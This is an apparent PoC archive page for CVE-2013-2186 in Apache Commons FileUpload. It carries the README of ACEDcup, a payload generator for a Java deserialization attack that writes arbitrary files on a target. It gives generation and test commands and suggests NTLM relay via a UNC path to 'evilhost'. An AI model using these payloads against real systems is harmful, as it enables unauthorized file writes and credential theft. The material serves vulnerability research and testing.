Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2013-2186 PoC — Apache Commons FileUpload 输入验证错误漏洞

Source
Associated Vulnerability
Title:Apache Commons FileUpload 输入验证错误漏洞 (CVE-2013-2186)
Description:The DiskFileItem class in Apache Commons FileUpload, as used in Red Hat JBoss BRMS 5.3.1; JBoss Portal 4.3 CP07, 5.2.2, and 6.0.0; and Red Hat JBoss Web Server 1.0.2 allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance.
Description
Payload generator for Java Binary Deserialization attack with Commons FileUpload (CVE-2013-2186)
Readme
# ACEDcup

ACEDcup tool is a payload generator for Java Binary Deserialization attack (ACED)

For Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) and Oracle JDK ver < 7u40

The attack works even for newer versions of the lib or Java. We can upload any content in any directory, but 
we cannot control a file name (smth like upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) in this situation. Hovewer, it may be useful in some cases. 

Also we can perform a NTLM-relay/sniffing attack (using \\\\evilhost\\any\\path) if your target is on Windows OS.

## Usage
```
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

```
## Example

 ```java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt```
 
 ```java -jar ser_reader D:\\cup_exploit\\serialized_payload.txt````
File Snapshot

[4.0K] /data/pocs/5a3eefe17f2d26ab614a45fde1ed1e81ee4bdb5c ├── [463K] aced_cup.jar ├── [1.5K] README.md ├── [233K] ser_reader └── [4.0K] sources ├── [1004] pom.xml └── [4.0K] src └── [4.0K] com └── [4.0K] greendog └── [4.0K] jser ├── [2.2K] CommUploadSer.java └── [2.1K] Exploit.java 5 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →